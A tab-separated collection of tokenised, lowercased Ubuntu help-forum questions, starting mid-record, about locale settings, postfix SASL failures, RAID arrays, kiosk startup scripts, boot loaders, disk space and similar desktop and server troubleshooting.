pt_br.utf-8 so , running this command by hand : gag @ desktop~ > /usr/share/language-tools/save-to-pam-env /home/likewise-open/certi/gag pt_br.utf-8 pt_br.utf-8 gag @ ccd-7840~ > locale lang= language= lc_ctype= '' posix '' lc_numeric= '' posix '' lc_time= '' posix '' lc_collate= '' posix '' lc_monetary= '' posix '' lc_messages= '' posix '' lc_paper= '' posix '' lc_name= '' posix '' lc_address= '' posix '' lc_telephone= '' posix '' lc_measurement= '' posix '' lc_identification= '' posix '' lc_all= gag @ desktop~ > cat .pam_environment language=en lang=en_us.utf-8 lc_numeric=pt_br.utf-8 lc_time=pt_br.utf-8 lc_monetary=pt_br.utf-8 lc_paper=pt_br.utf-8 lc_name=pt_br.utf-8 lc_address=pt_br.utf-8 lc_telephone=pt_br.utf-8 lc_measurement=pt_br.utf-8 lc_identification=pt_br.utf-8 it all seems fine , but restarting the pc and logging-in back things are still the same . by cli i can see that the locales are properly installed : gag @ desktop~ > locale -a | grep pt pt_br.utf8 pt_pt.utf8 gag @ desktop~ > locale -m | grep utf utf-8 i 've also tried : sudo apt-get install language-pack-pt language-pack-pt-base sudo apt-get install -- reinstall locales with no effect . when i login with another account the encoding is okay . ideas ?
277543	opening multiple tabs with gnome-terminal	i 'm trying to create a command that will open 3 services from the rails stack , rails s , spork , and autotest . i can run these commands individually by opening 3 terminals , going to the app folder and running them . i can even open 3 new tabs and run the commands on each . the problem is that they fail when i try to open the tabs via gnome-terminal like so : gnome-terminal -- tab -- title= '' rails s '' -e `` rails s '' -- tab -- title= '' spork '' -e `` spork '' -- tab -- title= '' autotest '' -e `` autotest '' error ( for spork and autotest ) : there was an error creating the child process for this terminal failed to execute child process `` spork '' ( no such file or directory ) surprisingly it does work for 'rails s ' ( the tab shows the server running ) . any ideas ?
277546	html5 multi touch events from touch screen	i have a ubuntu machine with a 24 '' touchscreen and it is working fine . i can move the mouse , do gestures with several touch points and such so the hardware is working fine . now i wonder if it is possible to make a browser interpret the events as touch and not as mousedown , mousedrag etc . html5 has really good support for touch and multiple touch and i would like to develop web applications for this setup . does anyone have a clue on how to do this ?
277551	problem with sproutcore	i am trying to create an application using sproutcore by doing the following : cd /home/user/development/sproutcore then sproutcore gen statechart_app testapp when i run the above command i see the following : ~ created directory at apps/test_app warn 19:39:59.009 ~ for specific help on how to use this generator , type : sc-gen statechart_app -- help fatal 19:39:59.009 ~ permission denied - /var/lib/gems/1.8/gems/sproutcore-1.9.1/lib/apps/test_app then i run the previous command again but this time with sudo . ~ created directory at apps/test_app ~ created file at apps/test_app/buildfile ~ created directory at apps/test_app/resources ~ created file at apps/test_app/resources/main_page.js ~ created file at apps/test_app/resources/loading.rhtml ~ created file at apps/test_app/resources/_theme.css ~ created file at apps/test_app/theme.js ~ created file at apps/test_app/main.js ~ created file at apps/test_app/statechart.js ~ created directory at apps/test_app/states ~ created file at apps/test_app/states/ready_state.js ~ created file at apps/test_app/core.js your application target is now ready to use ! although it says that my application is now ready to use i do n't see any testapp inside the sproutcore folder . why is that ? am i missing something ? i 'm running 12.04 lts .
277555	sasl authentication failure : no secret in database	i have a vps with plesk panel on ubuntu server 10.04 . everything was set up and working perfectly . only change i made to the mail configuration was to allow submission port 587 . everything was still working : imap , smtp etc . but yesterday , i think after an update , i noticed i ca n't send mails . so , now there is no way to make it work . these are messages i get in /var/log/mail.info : postfix/smtpd [ 9523 ] : warning : sasl authentication failure : no secret in database postfix/smtpd [ 9523 ] : warning : sasl digest-md5 authentication failed : one time use of a plaintext password will enable requested mechanism for user postfix/smtpd [ 9523 ] : disconnect ... there are many tutorials to make postfix work with dovecot , but i 'm afraid to install dovecot , because when i run apt-get install dovecot-imapd , it says that many psa-* features will be removed . any help is welcome . i did n't mess with anything until last night when i tried some of the solutions i found searching google , but with no luck at all . here are my main.cf : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file = /etc/postfix/postfix_default.pem smtpd_tls_key_file = $ smtpd_tls_cert_file smtpd_use_tls = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = lvps5-35-246-107.dedicated.hosteurope.de alias_maps = hash : /etc/aliases , hash : /var/spool/postfix/plesk/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = localhost.localdomain , localhost.dedicated.hosteurope.de , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :1 ] /128 5.35.246.107/32 mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 51200000 recipient_delimiter = + inet_interfaces = all inet_protocols = all virtual_mailbox_domains = $ virtual_mailbox_maps , hash : /var/spool/postfix/plesk/virtual_domains virtual_alias_maps = $ virtual_maps , hash : /var/spool/postfix/plesk/virtual virtual_mailbox_maps = hash : /var/spool/postfix/plesk/vmailbox transport_maps = hash : /var/spool/postfix/plesk/transport smtpd_tls_security_level = may smtp_tls_security_level = may smtp_use_tls = no smtpd_timeout = 3600s smtpd_proxy_timeout = 3600s disable_vrfy_command = yes smtpd_sender_restrictions = check_sender_access hash : /var/spool/postfix/plesk/blacklists , permit_sasl_authenticated , check_client_access pcre : /var/spool/postfix/plesk/non_auth.re smtpd_client_restrictions = permit_mynetworks smtp_send_xforward_command = yes smtpd_authorized_xforward_hosts = 127.0.0.0/8 [ : :1 ] /128 # sasl # smtpd_sasl_type = dovecot smtpd_sasl_auth_enable = yes # smtpd_sasl_path = smtpd # if your potential clients use outlook express or other older clients # this needs to be set to yes broken_sasl_auth_clients = yes smtpd_sasl_security_options = noanonymous smtpd_recipient_restrictions = permit_mynetworks , check_client_access pcre : /var/spool/postfix/plesk/no_relay.re , permit_sasl_authenticated , reject_unauth_destination virtual_mailbox_base = /var/qmail/mailnames virtual_uid_maps = static:110 virtual_gid_maps = static:31 smtpd_milters = inet : localhost:12768 non_smtpd_milters = inet : localhost:12768 sender_dependent_default_transport_maps = hash : /var/spool/postfix/plesk/sdd_transport_maps virtual_transport = plesk_virtual plesk_virtual_destination_recipient_limit = 1 mailman_destination_recipient_limit = 1 message_size_limit = 10240000 smtpd_tls_loglevel = 4 and my master.cf : # # postfix master process configuration file . for details on the format # of the file , see the master ( 5 ) manual page ( command : `` man 5 master '' ) . # # do not forget to execute `` postfix reload '' after editing this file . # # ========================================================================== # service type private unpriv chroot wakeup maxproc command + args # ( yes ) ( yes ) ( yes ) ( never ) ( 100 ) # ========================================================================== # -o smtpd_tls_security_level=encrypt # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # -o smtpd_tls_wrappermode=yes # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # 628 inet n - - - - qmqpd pickup fifo n - - 60 1 pickup cleanup unix n - - - 0 cleanup qmgr fifo n - n 1 1 qmgr # qmgr fifo n - - 300 1 oqmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp inet n - n - - smtpd submission inet n - n - - smtpd # when relaying mail as backup mx , disable fallback_relay to avoid mx loops relay unix - - - - - smtp -o smtp_fallback_relay= # -o smtp_helo_timeout=5 -o smtp_connect_timeout=5 showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache # ... i am no expert at this , and this is becoming very annoying now . it was working perfectly , and now i ca n't send mails .
277556	lxde system tray : skype , pidgin and other active applications not showing up	i 'm running lxde , and i 've noticed that applications that normally minimize to the tray are not showing up in the try in lxde . i do n't have a specific system tray applet installed , and ca n't seem to find one online . skype , and pidgin just become background processes when run , and i have to look them up with htop or ps to close them , or activate them again . is there any system tray package in the repos that will give me a system tray ? edit : lxpanel is already installed .
277557	where is a list of available package groups for kickstart ?	due to ( very ) long-time bug in system-config-kickstart , the package selection section does not list available packages , one has to edit the ks.cfg : this question explains how . an example given in the question is % packages @ ubuntu-server openssh-server ftp build-essential i 'm assuming @ ubuntu-server is a package group . where can i find this group name and other available package group names that can be added to the % packages section ? if i leave the % packages section completely blank , what gets installed ? nothing ?
277558	google chrome update itself ( without permission ) on ubuntu 12.04	i use google chrome and it is a addictive browser , it is super fast . but it forced updated itself on my ubuntu 12.04 today , which i did not like at all . my question how google chrome updated itself on ubuntu 12.04 without permission ? how to tell google chrome to `` knock on door before entering in the room '' ?
277565	how can i change the encoding of a subtitle file ?	i downloaded a greek subtitle for a movie , and this is what i see when i open it with gedit . subtitle works great on vlc , all perfect . but what if i want to edit this subtitle with some greek words ? i instantly get an error about character encoding . i hit retry and then vlc does n't recognize the subtitles ...
277567	delete confirmation dialog does n't show up when i delete a file	in ubuntu 12.10 , when i hit delete it just deletes the file with no confirmation dialog . and yes the 'ask before emptying rubbish bin or deleting files ' checkbox is ticked in on the behaviour tab in the files preferences is there something i 'm missing ? ?
277571	last command on .sh files wo n't run	i have this script in a *.sh file to enable natural scrolling . i 've added it to startup application . # ! /bin/sh xinput set-prop 11 268 -106 -106 nautilus -q & & nautilus -n the problem is , whenever i login , the last command ( nautilus -n ) wo n't run -which is annoying because i ca n't use the super button to open dash- and i have to run nautilus manually . what 's wrong ? update : i have tested my script above on terminal line-by-line , and it works fine . the problems only appear when i run it from .sh file . nautilus -q & & touch $ home/desktop/reported-success.txt give me the txt file , and the result of nautilus -q & & nautilus -n & > $ home/nautilus-output.log is : initializing nautilus-open-terminal extension initializing nautilus-image-converter extension initializing nautilus-dropbox 1.4.0
277576	why does my firefox profile folder keep showing up in recently used ( files/folders ) ?	in `` privacy and activity mgr '' , ( i would think ) the following are my relevant settings : yet in nautilus , my firefox profile folder shows up ( usually as the first entry ) in the recently used ( file/folder ) list : how can i prevent the firefox profile folder from showing up in recently used ? why are my `` privacy '' settings not honored ?
277577	i grew an array with mdadm but i ca n't see the progress ?	today i added a 5th drive in my array , i did the following : mdadm -- add /dev/md0 /dev/sdf1 my drive was added as a spare , i then did : mdadm -- grow /dev/md0 -- raid-devices=5 but when i want to check the progress with watch cat /proc/mdstat it gets stuck and i ca n't see what 's going on . meanwhile , i ca n't access the data wich i assume or hope is normal . any ideas ?
277579	in nautilus ' `` save as ... `` dialog , how can i open a ( sub- ) folder using my keyboard ( rather than the mouse ) ?	a case of ... title says it all ? in nautilus ' `` save as ... `` dialog , how can i open a sub-folder using my keyboard ( rather than the mouse ) ? thx !
277581	how to disable boot screen , just show the text output ?	when i turn on my computer , it shows a purple screen that says 'ubuntu ' in the middle . pressing the 'down ' key hides it and shows a terminal . how do i make it show the terminal by default ? i 've looked at this question but it 's for an older version ( 10.10 ) and none of it 's answers worked . uninstalling plymouth-theme-* packages just made the monitor stay off until the login screen loads , and editing /etc/default/grub was n't possible because that file did n't exist .
277582	samba setup completely broken	i have been trying to configure samba for a while now . as i had completely broken my setup , i followed the post on this site to completely reset samba to the defaults . ( see how do i completely reset samba to the shipped defaults ? ) now i can not reinstall samba ; it always complains about the fact that /etc/samba does n't exist . can i just recreate the folder/file ? am i missing some files if irecreate /etc/samba/smb.conf ? is there a template or what is the standard content of the smb.conf file ?
277588	change screen resolution in command-line ubuntu ?	i have ubuntu 12.10 running as a command line os ( no gui installed ) in vmware . but i can not figure out how to get my system out of the really small window that everything thats installed into vmware starts with . i followed what was written here : change boot screen resolution and it did not work for me so any other suggestions ?
277592	pre installed windows 8 on one hard drive and ubuntu 12.10 on separate hard drive . is this possible ?	i recently purchased a hp pavilion with windows 8 pre installed . i purchased a second hard drive and want to run ubuntu 12.10 . is it possible to boot from second hard drive and run ubuntu without even touching windows 8 , or having to disconnect the first hard drive every time i want to run ubuntu ? i 'm new at this and could use help . i have looked at many forums and all only discuss installing ubuntu on the same hard drive as windows 8 . i want to dual boot with two separate hard drives . any help would be greatly appreciated .
277593	best way to make my ubuntu portable	recently i had some issues backing up my ubuntu and i would like to know if there is any recommendation to make it more portable , for example : should i install everything that is possible within my home folder ? any good program ( or code ) to backup all installed programs in a way they can be used to restore another installation ? and maybe another os version ? cheers ,
277596	unable to connect to libvirt on virtual machine manager ?	i 'm trying to install a windows 8 vm using kvm and the virtual machine manager gui . upon installing kvm and vmm , and starting vmm i get the error unable to connect to libvirt . verify that : - the 'libvirt-bin ' package is installed - the 'libvirtd ' daemon has been started - you are member of the 'libvirtd ' group i tried apt-get install libvirt-bin and it was installed . but i do not know how to check if the daemon has started or check / add myself as a member .
277599	is it possible to change text console ( vt , framebuffer ) foreground color ?	i tried setterm -foreground green but any action resets the color back to white . also , switching black and white seems like a nice option for e-paper ( e-ink ) screens .
277600	can i use png instead of svg for icons ?	i 'm making a theme . i 'm new to the whole linux/ ubuntu thing . i have a lot of experience using photoshop/ gimp so drawing up some icons in those programs is a piece of cake to me . i was messing around with the theming in and i discovered that alot of the icons use svgs . so i assumed that i had to download inkscape and remake my icons . i really do n't like using inkscape though , plus i just do n't want to go through learning how to use another art program all over again . so how exactly do i replace svg icons with the pngs i made ? i 'm using linux mint 14 , but i figured i 'd ask here as it seems i 'd get more support and seeing that mint and ubuntu are very similar . i remember seeing something on a thread not to long ago that svgs tax the cpu and graphics more than pngs . that true ?
277601	chrome shows two icons in unity launcher	i am a new ubuntu user . i just installed 12.04 . to get chrome on the launcher , i clicked the bfb and searched for chrome , then dragged that icon to the launcher . however , when i run chrome , it creates a second icon for the running chrome . creating a second window creates a second triangle under the second chrome icon , with the first icon not doing anything . it is also apparently not locked to the launcher and i ca n't remove it . does anybody know how to remove the first icon ? i have locked the second icon to the launcher and it seems to be working fine , but i do n't want two icons .
277606	why ca n't i turn on recommendations in software center ?	every time i click the grey , `` turn on recommendations '' button at the bottom of the software center , it turns into a moving circle and then the grey button comes back . recommendations wo n't turn on no matter how many times i click . that 's the only problem i know of other than steam not showing up . so what 's going on and how do i fix it . cat ~/.config/software-center/softwarecenter.cfg [ general ] maximized = false size = 1200 , 800 add_to_launcher = true recommender_uuid = recommender_profile_id = email = local @ domain i deleted my keyring key for the center and re-logged in . still no go .
277609	gnome 3 uninstall failed ?	oke now i really messed up my system . i have tried to uninstall gnome 3 . i have followed this guide . but now my system do not anything at all . when i boot it stops when it needs to load the gui . i thought keep calm there must be an easy solution for this . i opened a tty and did this commands : sudo apt-get install dist-upgrade sudo apt-get install gnome-panel //get errors about dm : / sudo apt-get install gnome-shell //same sudo apt-get install ubuntu-desktop //get message that distibution is unstable sudo apt-get install unity start lightdm // do n't work : ( is there any way i can recover my system ?
277611	initramfs - unable to find a medium containing a live file system	i 'm desperately trying to install ubuntu 12.10 64bit on my new ultrabook . its a sony t13 with 8gb ram , 256gb ssd , i7 , windows 8 . i have an extra partition , d : `` ubuntu '' already created with about 30gb space using fat32 . ubuntu is md5 checked , on a previously working usb stick using unetbootin . grub loads fine when i ask to test out ubuntu ( `` try ubuntu without installing '' ) it shows the purple loading screen for a bit then brings up this error in a busybox terminal : initramfs - unable to find a medium containing a live file system things i 've tried that do n't work : different versions of linux ( fedora , arch , sl , even gparted ) using usb2/3 - no difference legacy or uefi - different interface , but same error bios has no option for anything `` achi '' related i have read through tons of other people having this problem and diligently tried all the above solutions , with no luck .
277617	.desktop file in xsessions folder not autorunning	i was setting up a kiosk per this tutorial http : //www.instructables.com/id/setting-up-ubuntu-as-a-kiosk-web-appliance/ ? allsteps i have hit a problem with the kiosk.desktop file since it is not autorunning when i login to the kiosk account . i can not figure out why . i have spent extensive hours googling the problem from several angles and am at a point where i ca n't get it without help . my kiosk.desktop file is located at /usr/share/xsessions/kiosk.desktop and it reads as follows . [ desktop entry ] encoding=utf-8 name=kiosk mode comment=chromium kiosk mode exec=/usr/share/xsessions/chromekiosk.sh type=application do i have any typos or something that is wrong in that regard ? i have also included my bash file to see if the problem is there not with the .desktop file . # ! /bin/bash xscreensaver -nosplash & width=`xrandr | grep \* | head -n1 | cut -d ' ' -f4 | cut -d'x ' -f1` height=`xrandr | grep \* | head -n1 | cut -d ' ' -f4 | cut -d'x ' -f2` echo $ width , $ height cat ~/.config/chromium/default/preferences | perl -pe `` s/\ '' work_area_bottom . */\ '' work_area_bottom\ '' : $ height , / '' > /tmp/tmp. $ $ cp /tmp/tmp. $ $ ~/.config/chromium/default/preferences cat ~/.config/chromium/default/preferences | perl -pe `` s/\ '' bottom . */\ '' bottom\ '' : $ height , / '' > /tmp/tmp. $ $ cp /tmp/tmp. $ $ ~/.config/chromium/default/preferences cat ~/.config/chromium/default/preferences | perl -pe `` s/\ '' work_area_right . */\ '' work_area_right\ '' : $ width , / '' > /tmp/tmp. $ $ cp /tmp/tmp. $ $ ~/.config/chromium/default/preferences cat ~/.config/chromium/default/preferences | perl -pe `` s/\ '' right . */\ '' right\ '' : $ width , / '' > /tmp/tmp. $ $ mv /tmp/tmp. $ $ ~/.config/chromium/default/preferences while true ; do chromium-browser % u -- kiosk -- start-maximized ; sleep 5s ; done
277618	ubuntu deleted /var/logs	is there a way to restore /var/log ? i do n't really care about past logs i at least need the dir structure so programs can write to their logs . for example i went to start apache and it failed because it could not write /var/log/apache2/error.log i ran sudo mkdir /var/log/apache2 tried again and apache loaded fine . i am concerned about other programs that may not load because they do not have the ability to write to their log file . i happened to notice apache failing to load as i was working with it at the time . had i not been updated my apache server this would have gone unknown .
277619	rescue system with dmraid ( 12.04lts )	i 've installed ubuntu into a fakeraid ( dmraid ) . i used fakeraid because i 'll need to dual boot with my windows 8 , which is n't still installed . my array and its partitions looks like the following ( under /dev/mapper ) : lrwxrwxrwx 1 root root 7 abr 3 22:04 isw_eecjdje_volume0 - > ../dm-0 lrwxrwxrwx 1 root root 7 abr 3 22:04 isw_eecjdje_volume0p1 - > ../dm-1 lrwxrwxrwx 1 root root 7 abr 3 22:04 isw_eecjdje_volume0p3 - > ../dm-2 lrwxrwxrwx 1 root root 7 abr 3 22:04 isw_eecjdje_volume0p5 - > ../dm-3 the 'p1 ' is my boot partition , 'p3 ' is the extended partition and 'p5 ' the one with my linux . i added 'p5 ' to an lvm volume called 'lvmvolume ' , so i 've got ( under /dev/mapper ) : lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-home - > ../dm-5 lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-raiz - > ../dm-4 lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-swap - > ../dm-9 lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-temporal - > ../dm-8 lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-usr - > ../dm-6 lrwxrwxrwx 1 root root 7 abr 3 22:04 lvmvolume-var - > ../dm-7 now my problem : i 've done sudo usermod -g dialout myuser , and that removed my user from all the other groups ( forgot -a : ( ) , so i 've no root ( by sudo or either login ) access . i booted into rescue mode with my ubuntu 12.04 install usb-key . after getting a console i see that things look a bit different : isw_eecjdje_volume0 , isw_eecjdje_volume0p3 and isw_eecjdje_volume0p5 disappeared , and isw_eecjdje_volume0p1 appears under /dev/md instead of /dev/mapper . the lvm logical volumes appears under /dev/mapper as expected , but if i mount /dev/mapper/lvmvolume-raiz ( my root filesystem ) under '/mnt ' rescue mode and i manually edit /mnt/etc/group to add myuser back to the groups i need those changes get lost after reboot ! ! another way to rescue i figured out is to add a delay to grub menu ( say 3 seconds , now it has no delay ) and then boot into single mode . the problem here is that my boot partition ( /dev/md/isw_eecjdje_volume0p1 in the rescue shell ) mounts read-only ! ! so i ca n't reinstall grub ... doing mount -o remount , rw /dev/md/isw_eecjdje_volume0p1 does not work . i 'm lost , does anybody have any clue ? i 've read that pressing shift during computer startup would give me the grub shell , but that 's not true . my main question is why ca n't i write to my lvmvolumes under the fakeraid partition ? although for this problem knowing how to force a grub shell would do the thing ...
277622	wireless and network icon dissapeared	after removing network manager and installing wicd so it would work with my eth0 and wlan0 cards the section regarding networks ( wireless and wired ) from the top - right side of ubuntu screen dissapeared . only blutooth is displaying . what should i do ? i tried reading and trying some related posts here and on the net but none worked .
277625	unistall ubuntu when wubi fails	i installed ubuntu using wubi on my windows 7 laptop about a year ago . i had n't used it for a while until a couple of days ago . i checked for software updates and got a bunch . i began to install them . during this process i opened the software center and tried to look at the software that i had currently installed . this seemed to mess up the installation process ( the details window began showing a terminal-like display ) . when it finally finished ( after about an hour ) i tried to shut it down . but it just hung for about half an hour without any disk activity , so i forced a shut-down by holding the power button . now when i go into ubuntu it runs very slowly or not at all . when i try to uninstall it with wubi it says “error executing command command=c : \windows\sysnative\bcdedit.exe/delete { … } \f retval=1 stderr=an error occurred while attempting to delete the specified entry . the system can not find the file specified” is there any way to delete ubuntu while leaving my windows system in place in this situation ? any suggestions very gratefully received .
277635	how do i disable the keyboard shortcut overlay in ubuntu 12.10 ?	i 'd like to be able to disable the keyboard shortcut overlay that appears when you hold the super/meta/windows key or at least make it hidden . it is annoying , i find no use for it , and it interferes with usage of a windows vm in vmware - whenever i click the meta key , the button is interpreted by both ubuntu and the vm , causing the overlay to appear . i am aware of this question describing how to solve the issue in ubuntu 12.04 . unfortunately , both of the methods provided in there are unavailable in ubuntu 12.10 . is there some setting in gconf or dconf or even ccsm that i 'm missing , or is this display now unable to be turned off in 12.10 ?
277638	tried to follow the ec2 juju guide and it fails	i am evaluating juju and when following the very basic tutorial https : //juju.ubuntu.com/docs/getting-started.html , literally following every single instruction to a t , all i end up when trying to bootstrap is this error : ubuntu @ ip-xxx : ~ $ juju bootstrap 2013-04-03 22:10:48,016 info bootstrapping environment 'sample' ( origin : ppa type : ec2 ) ... 2013-04-03 22:10:48,494 error bootstrap aborted because file storage is not writable : error message : access denied am i missing something ? the user for which i entered the access key information has all permissions except the ability to modify iam . right now , juju is not looking so promising if i ca n't even get the basic tutorial to work . i started out with ami : ubuntu/images/ebs/ubuntu-precise-12.04-amd64-server-20130325 any help would be greatly appreciated .
277641	usb live error , `` can not open output file f : \autorun.inf ''	when i try boot the usb from bios into ubuntu 12.10 it just comes to a menu with a black screen and a couple lines of text . there is no option to run from usb even though i have persistence enabled . here 's a picture of the screen :
277643	how can i enable mod_rewrite logs ?	i 'm having trouble with my .htaccess redirects , and i want to enable logs on the the mod_rewrite module so i can figure out what 's going on . the trouble is , httpd.conf does n't seem to exist anymore in 12.10 , and all the guides i can find for enabling logs ( like this ) suggest editing httpd.conf . how can i enable mod_rewrite logs ?
277648	ca n't load ubuntu on virtualbox	i am new to virtualbox and to ubuntu . i have a pc running vista and am trying to install ubuntu and then run nasa linux software . in my first try i installed virtualbox and set up a virtual computer named ubuntu . then i downloaded a ubuntu iso file . the first time wizard could n't find the iso file . the second try , i downloaded the iso file and saved it to the desktop . the virtualbox could no longer use the first time wizard and i could n't find cd/dvd in the menu . please help with some step .
277652	do i really need both bootloaders ? it really slow down the actual boot up time	dear readers of this question i 'm a beginning learner in the wonderful of linux . its great , but i got to solve the problem by myserlf so please help me ! setup : macbook pro 8,1 , refit , grub2 , lion , ubuntu 04.12 problem : my boot takes too long because i have to go through two bootloaders . refit > > grub > > then finally ubuntu ! also , when i try to boot another os from usb for test ( elementary os luna ) , refit recoganize it , i select penguin mark with usb , and grub loads and shows only ubuntu , not os . my guess is having two bootloader is somehow making computer confuse , sooooo , do i really need two step bootloader ? one more thing related to booting process . at login screen , i can select desktop environment . i have unify and genome desktop both with cairo dock . when i change desktop environment , it does not correctly load the setting . its almost like all the themes got mixed up under the hood . here is how i end up with my dual-boot setting ( which is my main question ) i set up dual-boot machine on macbookpro 8,1 originally running lion . i followed the instruction from online article and setup dual boot machine with lion and ubuntu 04.12. http : //lifehacker.com/5934942/how-to-dual-boot-linux-on-your-mac-and-take-back-your-powerhouse-apple-hardware the instruction i had made me install refit , then install ubuntu which installed grub2 automcally . at very least i did not configure intentionally . my boot process goes , turn the swith on , select os from refit , then wait , press return at grub menu , then wait and enter password at login . idealy , i want to get rid of one . i want to keep grub for features and avaialble themes , but i know grub has issues with macbookpro 8,1 so i guess i am keeping refit unless someone fixed those issues . how exactly do i proceed ? best regard ,
277661	unable to install qt4-designer under ubuntu 12.10	i failed to install qt4-designer under ubuntu 12.10 because i got this error message : qt4-designer : depends : libqt4-designer ( =4:4.8.3+dfsg-0ubuntu3.1 ) but 4:4.8.3+dfsg-0ubuntu4~quantal1~test4 is to be installed depends : libqt4-network ( =4:4.8.3+dfsg-0ubuntu3.1 ) but 4:4.8.3+dfsg-0ubuntu4~quantal1~test4 is to be installed depends : libqt4-xml ( =4:4.8.3+dfsg-0ubuntu3.1 ) but 4:4.8.3+dfsg-0ubuntu4~quantal1~test4 is to be installed depends : libqtcore4 ( =4:4.8.3+dfsg-0ubuntu3.1 ) but 4:4.8.3+dfsg-0ubuntu4~quantal1~test4 is to be installed depends : libqtgui4 ( =4:4.8.3+dfsg-0ubuntu3.1 ) but 4:4.8.3+dfsg-0ubuntu4~quantal1~test4 is to be installed how can i fix this issue ?
277664	how do i stop this constant loss of free space ?	i was running ubuntu , as normal , when suddenly i got a dialog box that said i only had 1.2 gb of free space left . an hour before , i had 30 gb of free space . i deleted some stuff and brought the free space up to 25 gb . but it continues to decrease . i tried removing old log files and truncating log files and such , and it continues to decrease ! i tried using disk analyzer to find where all this free space loss was coming from and that did n't work , as it showed everything as it should be . i rebooted and eventually ubuntu did a disk check that somehow brought the free space back up to 40 gb but it still continues to decrease about 10 gb a day . i continue to try and find new ways to free space , but its like an automated process of decreasing disk space that i can not get to stop . i do n't know what to do . how can i find the cause , and stop my free space from decreasing ? here is the output from sudo du -sh /var/* ~/.xsession-errors : 13m /var/backups 204m /var/cache 112m /var/crash 4.0k /var/games 503m /var/lib 4.0k /var/local 0 /var/lock 9.5g /var/log 85m /var/mail 4.0k /var/metrics 24k /var/opt 0 /var/run 1.7m /var/spool 391m /var/tmp 11g /var/tvmobili 20k /var/www 224k /home/school/.xsession-errors
277665	apt-get vs wget	so i used wget to install winetricks instead of apt-get . i noticed when you install things via apt-get , you can just type the name ( i.e . winetricks ) in terminal and it 'll run it , same with the dash . when i installed via wget , terminal tells me winetricks is currently not installed . you can install it by typing : sudo apt-get install winetricks . what do you call it when a program is registered with the os from apt-get so you can just open it easily from terminal/dash ? how do you make it so other programs can be opened like that ( like my winetricks that i installed from a wget command ) ?
277668	how to delete all the things off a hard drive seperately	i need to delete all the files off my dying hard drive in ubuntu v.11.10 . if i could have a quick response that would be great because my computer is also dying . thanks
277674	ssh into ubuntu 12.10 from a remote computer	i am trying to login to my ubuntu 12.10 desktop remotely . i have the ssh server installed and it works fine when i am on the same network as the ubuntu desktop . however , i am unable to connect remotely from anywhere . this is my first time setting up my own ssh server and i am a noob at it . thanks in advance !
277675	how i can configure conky	i installed conky in ubuntu 12.10 download software center , but i ve no idea how update or upgrade and configure it with all different scripts to conky , if i want configure conky with conky colors what can i do ? ? ? . i know almost nothing of the commands in the terminal , i apreciate a lots a so simple explanation step by step . thank you .
277680	problems with ssl in arora	i installed arora browser in my ubuntu 12.10 all works pretty good with arora browser but since 5 days ago appears this message when i go to my hotmail page : errores ssl : issuer certificate of a locally looked up certificate could not be found the root ca certificate is not trusted for this purposeamailfolder.read.next % 3awc.hotmailthe issuer certificate of a locally looked up certificate could not be found the root ca certificate is not trusted for this purposeamailfolder.read.next & plt=1616 & ir=1 & ex=1 & c.f=inbox & c.rp=off & c.pf=1 & r=0.3346620637457818 the issuer certificate of a locally looked up certificate could not be found the root ca certificate is not trusted for this purpose how i can fix it ? some people said me that i should compile arora or some like that , but i dont know how do it . thank you in advance any easy explanation
277681	unable to mount windows ntfs partition	i have a computer that is dual booting with windows 8 , and ubuntu 12.10 . everything works fine i am able to boot into both os 's as expected . but when i try to boot into ubuntu , and mount the windows partition i get the following error : can someone please help me remedy the problem ?
277685	what version of clonezilla live should i use ?	i have installed ubuntu 12.10 quantal quetzal 64 bits , on a different partition windows vista 32 bits ( brought this factory and i is useful for programs that bring ) . i want to clone both os with clonezilla live , but in the clonezilla-live page appears me different download options , and i dont know what of all options are correct and make a right choice for optimal cloning of these operating systems , the options to appears me in the download clonezilla-live page , are these : estables emisiones ( .iso / .zip ) - 2.1.1-7 clonezilla-live-20130314-quantal-i386 clonezilla-live-2.1.1-7-amd64.zip clonezilla-live-2.1.1-7-amd64.iso clonezilla-live-2.1.1-7-i486.zip clonezilla-live-2.1.1-7-i486.iso clonezilla-live-2.1.1-7-i686-pae.zip clonezilla-live-2.1.1-7-i686-pae.iso what is the difference between clonezilla-live based on debian , and the alternative one based on ubuntu ? . i want burn clonezilla-live on a dvd , so i guess that the zip is dont to me , no ? what is the right to choose to me ? thank you in advance any easy explanation .
